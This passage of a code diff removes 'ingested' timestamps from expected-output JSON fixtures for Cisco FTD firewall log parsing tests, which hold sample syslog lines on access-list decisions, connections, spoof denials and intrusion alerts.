"2021-12-29T10:00:14.593808508Z", "original": "\u003c14.2\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Audit Log Settings \u003e Modified: Send Audit Log to Syslog enabled \u003e Disabled", "code": "" }, diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json index 4c73b0d54fe..9e4592361d0 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json @@ -64,7 +64,6 @@ }, "event": { "severity": 0, - "ingested": "2021-12-29T10:00:19.695772397Z", "original": "2019-08-16T09:54:00Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55644, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -178,7 +177,6 @@ }, "event": { "severity": 0, - "ingested": "2021-12-29T10:00:19.695775037Z", "original": "2019-08-16T09:57:02Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55868, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -290,7 +288,6 @@ }, "event": { "severity": 0, - "ingested": "2021-12-29T10:00:19.695775893Z", "original": "2019-08-16T10:04:44Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 39114, Protocol: tcp, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -400,7 +397,6 @@ }, "event": { "severity": 0, - "ingested": "2021-12-29T10:00:19.695776622Z", "original": "2019-08-16T10:09:47Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 40740, Protocol: 6, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json index e378bcbc00d..fb5fe9be3b3 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json @@ -48,7 +48,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:22.072166898Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: ApplicationProtocol: http, Client: webserver, DstIP: 10.8.12.47, SrcIP: 10.1.123.45, Message: Intrusion attempt", "code": "430001", "kind": "alert", @@ -109,7 +108,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:22.072169626Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2).", "code": "430001", "kind": "alert", @@ -167,7 +165,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:22.072170499Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2), Empty: ,FileCount:, IngressZone:", "code": "430002", "kind": "event", @@ -243,7 +240,6 @@ }, "event": { "severity": 3, - "ingested": "2021-12-29T10:00:22.072171265Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: %ASA-3-430005 Message: This one has a type id, HTTPResponse: 404, Message: And two messages, SrcIP: 127.0.0.1, DstIP: 192.168.3.33, SrcPort: 512, DstPort: 64311", "code": "430005", "kind": "alert", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json index 0d515820599..3293ed78edd 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json @@ -67,7 +67,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:23.254346331Z", "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", @@ -132,7 +131,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:23.254349138Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -214,7 +212,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:23.254350126Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index cfd680c1cff..f4ef0afa2c5 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -48,7 +48,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981482640Z", "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -118,7 +117,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981485280Z", "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -188,7 +186,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981486123Z", "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -266,7 +263,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981486932Z", "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", @@ -343,7 +339,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981487698Z", "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", @@ -413,7 +408,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981488840Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", @@ -484,7 +478,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981489612Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", @@ -556,7 +549,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981490377Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", @@ -631,7 +623,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981491154Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", @@ -703,7 +694,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981491925Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", @@ -776,7 +766,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981492745Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", @@ -850,7 +839,6 @@ "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-12-29T10:00:24.981493616Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", @@ -923,7 +911,6 @@ "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-12-29T10:00:24.981494385Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", @@ -991,7 +978,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981495136Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1058,7 +1044,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981495886Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", @@ -1131,7 +1116,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981496642Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", @@ -1195,7 +1179,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981497495Z", "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -1261,7 +1244,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981498247Z", "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1331,7 +1313,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981499011Z", "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1401,7 +1382,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981499771Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1471,7 +1451,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981500540Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1541,7 +1520,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981501303Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1611,7 +1589,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981502057Z", "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1681,7 +1658,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981502914Z", "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1751,7 +1727,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981503666Z", "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1821,7 +1796,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981504421Z", "original": "Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1891,7 +1865,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981505228Z", "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1957,7 +1930,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981505996Z", "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", @@ -2017,7 +1989,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981506748Z", "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -2083,7 +2054,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981507501Z", "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2153,7 +2123,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981508247Z", "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2223,7 +2192,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981509076Z", "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2293,7 +2261,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981509831Z", "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2363,7 +2330,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981510586Z", "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2433,7 +2399,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981511449Z", "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2503,7 +2468,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981512203Z", "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2573,7 +2537,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981513022Z", "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2643,7 +2606,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981513790Z", "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2713,7 +2675,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981514547Z", "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2792,7 +2753,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981515310Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2871,7 +2831,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981516063Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -2948,7 +2907,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981516893Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -3026,7 +2984,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981517647Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3106,7 +3063,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981518396Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3188,7 +3144,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T10:00:24.981519156Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", @@ -3269,7 +3224,6 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-29T10:00:24.981519915Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3350,7 +3304,6 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-29T10:00:24.981520672Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3423,7 +3376,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981521502Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3493,7 +3445,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981522258Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3568,7 +3519,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981523012Z", "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", @@ -3646,7 +3596,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981523867Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3726,7 +3675,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T10:00:24.981524625Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3808,7 +3756,6 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-12-29T10:00:24.981525459Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", @@ -3881,7 +3828,6 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-12-29T10:00:24.981526225Z", "original": "Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3948,7 +3894,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981526986Z", "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4012,7 +3957,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981527739Z", "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4076,7 +4020,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981528495Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4140,7 +4083,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981529314Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4204,7 +4146,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981530073Z", "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4268,7 +4209,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981530841Z", "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4332,7 +4272,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981531595Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4396,7 +4335,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T10:00:24.981532348Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4471,7 +4409,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981533176Z", "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", @@ -4536,7 +4473,6 @@ }, "event": { "severity": 3, - "ingested": "2021-12-29T10:00:24.981533928Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4599,7 +4535,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981534692Z", "original": "Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4680,7 +4615,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981535447Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", @@ -4762,7 +4696,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981536210Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", @@ -4844,7 +4777,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T10:00:24.981536978Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", @@ -4908,7 +4840,6 @@ }, "event": { "severity": 5, - "ingested": 